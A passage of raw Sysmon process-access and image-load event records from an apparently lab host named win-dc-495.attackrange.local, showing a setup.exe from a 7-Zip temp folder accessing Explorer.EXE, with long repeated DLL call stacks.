\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015123Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000015122Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\msvcp140.dll2021-01-18 13:59:52.442 10341000x800000000000000015121Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015120Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015119Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015118Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015117Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015116Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015115Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015114Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015113Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015112Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015111Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015110Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015109Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015108Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015107Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015106Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015105Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 